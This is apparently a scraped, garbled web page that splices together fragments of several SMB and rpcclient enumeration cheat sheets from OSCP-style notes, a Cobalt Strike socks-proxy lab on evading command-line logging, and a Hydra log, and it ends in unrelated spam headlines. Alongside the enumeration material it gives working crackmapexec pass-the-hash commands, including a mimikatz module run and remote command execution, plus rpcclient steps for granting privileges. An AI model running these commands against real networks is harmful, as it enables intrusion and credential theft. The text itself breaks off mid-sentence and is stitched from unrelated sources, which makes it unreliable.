To look for possible exploits to the SMB version it important to know which version is being used. # download everything recursively in the wwwroot share to /usr/share/smbmap. The tool that we will be using for all the enumerations and manipulations will be rpcclient. Dec 2, 2018, PWK Notes: SMB Enumeration Checklist [Updated]. -I, --dest-ip=IP Specify destination IP address, Help options # lines. SaPrintOp 0:65283 (0x0:0xff03). | grep -oP 'UnixSamba. without the likes of: which most likely are monitored by the blue team. To enumerate the shares manually you might want to look for responses like NT_STATUS_ACCESS_DENIED and NT_STATUS_BAD_NETWORK_NAME, when using a valid session (e.g. | Comment: Default share rpcclient (if 111 is also open) NSE scripts. netname: IPC$ Nmap scan report for [ip] A collection of commands and tools used for conducting enumeration during my OSCP journey. REG One of the first enumeration commands to be demonstrated here is the srvinfo command. netname: PSC 2170 Series | IDs: CVE:CVE-2006-2370 This cheat sheet should not be considered to be complete and only represents a snapshot in time when I used these commands for performing enumeration during my OSCP journey. result was NT_STATUS_NONE_MAPPED After creating the group, it is possible to see the newly created group using the enumdomgroup command. MAC Address = 00-50-56-XX-XX-XX, [+] Finding open SMB ports. This information can be elaborated on using the querydispinfo. Port_Number: 137,138,139 #Comma separated if there is more than one. Host is up (0.030s latency). If Im missing something, leave a comment. ** (extracted from, 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP), and entire directories and other network resources such as printers, routers, or interfaces released for the network. remark: IPC Service (Mac OS X) Get help on commands . samlookuprids Look up names A Little Guide to SMB Enumeration. enumalsgroups Enumerate alias groups rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2004 To begin the enumeration, a connection needs to be established. Two applications start a NetBIOS session when one (the client) sends a command to call another client (the server) over, 139/tcp open netbios-ssn Microsoft Windows netbios-ssn. Host script results: The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following: If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about. nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24, nmap --script smb-enum-shares -p 139,445 $ip, smbclient -L //10.10.10.3/ --option='client min protocol=NT1', # if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED", SAMBA 3.x-4.x # vulnerable to linux/samba/is_known_pipename, SAMBA 3.5.11 # vulnerable to linux/samba/is_known_pipename, nmap --script=smb-enum* --script-args=unsafe=1 -T5 $ip, nmap --script=smb-vuln* --script-args=unsafe=1 -T5 $ip, nmap --script=smb2-capabilities,smb-print-text,smb2-security-mode.nse,smb-protocols,smb2-time.nse,smb-psexec,smb2-vuln-uptime,smb-security-mode,smb-server-stats,smb-double-pulsar-backdoor,smb-system-info,smb-vuln-conficker,smb-enum-groups,smb-vuln-cve2009-3103,smb-enum-processes,smb-vuln-cve-2017-7494,smb-vuln-ms06-025,smb-enum-shares,smb-vuln-ms07-029,smb-enum-users,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-ls,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-os-discovery --script-args=unsafe=1 -T5 $ip, nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script 'not brute and not dos and smb-*' -vv -d $ip, Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default, Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default. rpcclient $> help This will attempt to connect to the share. S-1-5-21-1835020781-2383529660-3657267081-1007 LEWISFAMILY\sys (2) First one - two Cobalt Strike sessions: Second - attacker opens a socks4 proxy on port 7777 on his local kali machine (10.0.0.5) by issuing: {% code-tabs %} A collection of commands and tools used for conducting enumeration during my OSCP journey. | execute arbitrary code via certain crafted "RPC related requests" aka the "RRAS Memory Corruption Vulnerability." --------------- ---------------------- *', # download everything recursively in the wwwroot share to /usr/share/smbmap. Enumerate Domain Users. | Current user access: READ/WRITE Using lookupnames we can get the SID. Server Message Block in modern language is also known as Common Internet File System. samdeltas Query Sam Deltas Works well for listing and downloading files, and listing shares and permissions. for all files), recurse: toggles recursion on (default: off), prompt: toggles prompting for filenames off (default: on), mget: copies all files matching the mask from host to client machine, Specially interesting from shares are the files called, by all authenticated users in the domain. lsalookupprivvalue Get a privilege value given its name Similarly to enumerate the Primary Domain Information such as the Role of the machine, Native more of the Domain can be done using the dsroledominfo command as demonstrated. After the user details and the group details, another information that can help an attacker that has retained the initial foothold on the domain is the Privileges. adddriver Add a print driver rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002 Hydra v5.1 (c) 2005 by van Hauser / THC - use allowed only for legal purposes. Reverse Shell. setprintername Set printername These commands can enumerate the users and groups in a domain. | and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to To demonstrate this, the attacker first used the lsaaddpriv command to add the SeCreateTokenPrivielge to the SID and then used the lsadelpriv command to remove that privilege from that group as well. | Risk factor: HIGH WORKGROUP <00> - M S-1-5-21-1835020781-2383529660-3657267081-1013 LEWISFAMILY\mail (2) Defense Evasion. srvinfo Server query info This command can help with the enumeration of the LSA Policy for that particular domain. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. --usage Display brief usage message, Common samba options: Match. lsaaddacctrights Add rights to an account result was NT_STATUS_NONE_MAPPED Where the output of the magic script needs to be stored? S-1-5-21-1835020781-2383529660-3657267081-501 LEWISFAMILY\unknown (1) netremotetod Fetch remote time of day -i, --scope=SCOPE Use this Netbios scope, Authentication options: Nice! Password: to access through Web; FTP to file upload ==> Execute from web == webshell ; Password Checking if you found with other enum. if [ -z $1 ]; then echo "Usage: ./smbver.sh RHOST {RPORT}" && exit; else rhost=$1; fi, if [ ! Learn offensive CTF training from certcube labs online . Use `proxychains + command" to use the socks proxy. maybe brute-force ; 22/SSH. However, for this particular demonstration, we are using rpcclient. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME), # returns NT_STATUS_ACCESS_DENIED or even gives you a session. To enumerate the Password Properties on the domain, the getdompwinfo command can be used. In this communication, the child process can make requests from a parent process. But sometimes these don't yield any interesting results. C$ Disk Default share enumdata Enumerate printer data There was a Forced Logging off on the Server and other important information. addprinter Add a printer #rpcclient $>srvinfo #rpcclient $>enumdomusers #rpcclient $>querydominfo #rpcclient $>getdompwinfo //password policy #rpcclient $>netshareenum #nmblookup -A 192.168.1.1 If you want to enumerate all the shares then use netshareenumall. At this point in time, if you can use anonymous sessions, then there are some very useful commands within the tool. Enumerating Windows Domains with rpcclient through SocksProxy == Bypassing Command Line Logging This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370 deleteform Delete form -z $2 ]; then rport=$2; else rport=139; fi, tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' Are you sure you want to create this branch? Sharename Type Comment NETLOGON MAC Address: 00:50:56:XX:XX:XX (VMware) It can be enumerated through rpcclient using the lsaenumsid command. The RPC service works on the RPC protocols that form a low-level inter-process communication between different Applications. offensive security. rpcclient -U '%' -N <IP> Web-Enum . It contains contents from other blogs for my quick reference DFS -c, --command=COMMANDS Execute semicolon separated cmds To do this first, the attacker needs a SID. rewardone in the PWK forums posted a neat script to easily get Samba versions: When you run this on a box running Samba, you get results: When in doubt, we can check the smb version in PCAP. INet~Services <1c> - M -O, --socket-options=SOCKETOPTIONS socket options to use In the demonstration, it can be observed that the SID that was enumerated belonged to the Administrator of the Builtin users. The manipulation of the groups is not limited to the creation of a group. Thus it might be worth a short to try to manually connect to a share. In the scenarios where there is a possibility of multiple domains in the network, there the attacker can use enumdomains to enumerate all the domains that might be deployed in that network. This command can be used to extract the details regarding the user that the SID belongs. It is possible to perform enumeration regarding the privileges for a group or a user based on their SID as well. os version : 4.9 lsaenumsid Enumerate the LSA SIDS queryusergroups Query user groups Heres an example Unix Samba 2.2.3a: Windows SMB is more complex than just a version, but looking in wireshark will give a bunch of information about the connection. dfsremove Remove a DFS share --------------- ---------------------- MAC Address: 00:50:56:XX:XX:XX (VMware) |_smb-vuln-ms10-061: false and therefore do not correspond to the rights assigned locally on the server. # lines. SMB stands for Server Message Blocks. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. smbmap -H [ip/hostname] will show what you can do with given credentials (or null session if no credentials). The article is focused on Red Teamers but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. | smb-vuln-ms06-025: logonctrl2 Logon Control 2 rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1013 May need to run a second time for success. Red Team Infrastructure. -V, --version Print version, Connection options: so lets run rpcclient with no options to see whats available: SegFault:~ cg$ rpcclient MSRPC was originally derived from open source software but has been developed further and copyrighted by . SMB2 Windows Vista SP1 and Windows 2008, crackmapexec -u 'guest' -p '' --shares $ip, crackmapexec -u 'guest' -p '' --rid-brute 4000 $ip, crackmapexec -u 'guest' -p '' --users $ip, crackmapexec smb 192.168.1.0/24 -u Administrator -p, crackmapexec smb 192.168.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B, crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -M mimikatz 192.168.1.0/24, crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B -x whoami $ip, crackmapexec -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949B --exec-method smbexec -x whoami $ip# reliable pth code execution. RPC is built on Microsofts COM and DCOM technologies. It is also possible to add and remove privileges to a specific user as well. -P, --machine-pass Use stored machine account password netshareenum Enumerate shares In the demonstration, it can be observed that the current user has been allocated 35 privileges. Host is up (0.037s latency). | \\[ip]\share: S-1-5-21-1835020781-2383529660-3657267081-2002 LEWISFAMILY\user (1) Another command to use is the enumdomusers. Hence, they usually set up a Network Share. authentication openprinter Open printer handle getdriver Get print driver information | Current user access: | References: This is an approach I came up with while researching on offensive security. The rpcclient was designed to perform debugging and troubleshooting tasks on a Windows Samba configuration. All rights reserved. [+] User SMB session establishd on [ip] | VULNERABLE: After the tunnel is up, you can comment out the first socks entry in proxychains config. -W, --workgroup=WORKGROUP Set the workgroup name lewis S-1-5-21-1835020781-2383529660-3657267081-2002 (User: 1) This will extend the amount of information about the users and their descriptions. {% code-tabs-item title="attacker@kali" %}. | smb-enum-shares: What permissions must be assigned to the newly created files? rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1008 Hydra (http://www.thc.org) starting at 2007-07-27 21:51:46 Moving on, same way, they can query info about specific AD users: Enumerate current user's privileges and many more (consult rpcclient for all available commands): Finally, of course they can run nmap if needed: Impacket provides even more tools to enumerate remote systems through compromised boxes. result was NT_STATUS_NONE_MAPPED This can be verified using the enumdomgroups command. Protocol_Description: Server Message Block #Protocol Abbreviation Spelled out. Code Execution. shutdownabort Abort Shutdown (over shutdown pipe) Might ask for password.
Ray From Seal Team Haircut,
What Yttd Character Has A Crush On You,
Snakes In Acadia National Park,
Bootstrap Modal Close On Click Outside,
Feeling A Presence While Sleeping,
Articles R
